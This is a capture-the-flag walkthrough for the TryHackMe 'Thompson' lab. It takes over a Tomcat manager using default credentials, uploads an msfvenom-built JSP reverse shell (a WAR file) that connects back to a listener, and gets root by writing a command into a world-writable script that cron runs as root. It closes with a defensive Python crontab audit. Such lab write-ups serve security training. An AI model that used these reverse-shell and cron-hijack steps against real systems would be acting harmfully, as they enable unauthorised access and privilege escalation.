TryHackMe Thompson
Hello Everyone! Today we are going to solve the TryHackMe machine Thompson.
First, connect to the THM network using the VPN and start the machine.
Start with an Nmap scan to find out which ports are open and which services are running on the machine.
Note: If you are running as root, you don't need to prefix the commands with sudo.
nmap -Pn 10.10.195.168
Perform a more detailed scan (default scripts, version detection and OS detection) to find out the service versions running on the system.
nmap -sC -sV -A 10.10.195.168
Let's open the IP address in the browser to see what the web page shows.
Check every page for useful information. If we open the manager app, it asks for a username and password.
Once we click on Cancel, the error page gives us the username "tomcat" and the password "s3cret".
Now, try to log in with those credentials.
We successfully logged into the manager app. It lists a lot of directories and information, and we can see that it allows us to upload a WAR file.
So we can upload a payload and get a reverse shell, but the upload only accepts files in WAR format. Try googling for a suitable payload and see what we can find.
We found a command to generate a payload that gives us a reverse shell.
ifconfig tun0
LHOST is our tun0 IP, and LPORT can be any port we choose.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war
Now upload the shell.war file through the website. Before that, check where it is being uploaded to, and afterwards confirm that the upload succeeded.
We can see that it has been deployed under /manager, and our shell shows up in the list of applications. Now, start a netcat listener on the chosen port, click on the shell application in the browser, and we get our connection.
nc -nlvp 1234
Check which user we are and what the current working directory is.
In the /home/jack folder we find the user flag. To escalate privileges and get a root shell, we still need to find a way in.
cat user.txt
Get an interactive shell using Python so that we can work more comfortably.
python -c 'import pty; pty.spawn("/bin/bash")'
We also noticed another file in that directory, id.sh, and it has full permissions set for everyone. Check whether it is run regularly with root privileges by looking at /etc/crontab.
cat /etc/crontab
We can see that it runs every minute as root, and that it runs from the /home/jack directory. Since we can write to id.sh, we can use it to copy the root flag from the file /root/root.txt into a new file, finalflag.txt.
echo "cat /root/root.txt > finalflag.txt" > id.sh
Wait a minute for the cron job to run, and our finalflag.txt file appears.
ls
We finally got our root flag. There are other ways to get it as well, but I simply copied it from the /root directory.
cat finalflag.txt
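As an added example that is not part of the original walkthrough, here is the defensive counterpart of the cron issue above: a small Python audit that parses an /etc/crontab-style file and flags root jobs whose script is writable by group or others, which is exactly what made id.sh hijackable. The crontab text and the id.sh it checks are constructed in a temporary directory so the script runs offline; the `cd DIR && bash script` handling mirrors the entry seen in the room.

```python
import os
import stat
import tempfile

INTERPRETERS = {"bash", "sh", "python", "python3", "perl"}

def parse_system_crontab(text):
    """Yield (user, command) for each job line of an /etc/crontab-style file (m h dom mon dow user cmd)."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:  # SHELL=/PATH= lines and malformed entries are skipped
            continue
        yield fields[5], fields[6]

def script_paths(command):
    """Extract the script each '&&'-separated segment runs, honouring a preceding 'cd DIR'."""
    cwd = "/"
    for segment in command.split("&&"):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = tokens[1] if len(tokens) > 1 else cwd
            continue
        target = tokens[1] if tokens[0] in INTERPRETERS and len(tokens) > 1 else tokens[0]
        yield target if os.path.isabs(target) else os.path.join(cwd, target)

def writable_by_others(path):
    """True when group or world can write the file: the flaw that let id.sh be replaced."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, privileged_user="root"):
    """Return [(user, script)] for privileged jobs whose script is writable by group or others."""
    return [(user, path)
            for user, command in parse_system_crontab(text)
            if user == privileged_user
            for path in script_paths(command)
            if writable_by_others(path)]

def demo():
    """Constructed scenario: a world-writable id.sh in a temp 'home' run every minute by root."""
    with tempfile.TemporaryDirectory() as home:
        script = os.path.join(home, "id.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\nid\n")
        os.chmod(script, 0o777)  # same permissive mode the room relies on
        crontab = f"SHELL=/bin/sh\n* * * * * root cd {home} && bash id.sh\n17 * * * * root run-parts /etc/cron.hourly\n"
        findings = audit_crontab(crontab)
        os.chmod(script, 0o755)  # owner-only write: the job is no longer flagged
        return findings, audit_crontab(crontab), script
```

Running `demo()` returns one finding for the 0o777 script and none once it is tightened to 0o755; the same `audit_crontab` can be fed the real /etc/crontab on a host you administer.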
Finally, we have successfully completed the machine.
This concludes the room, with both flags captured!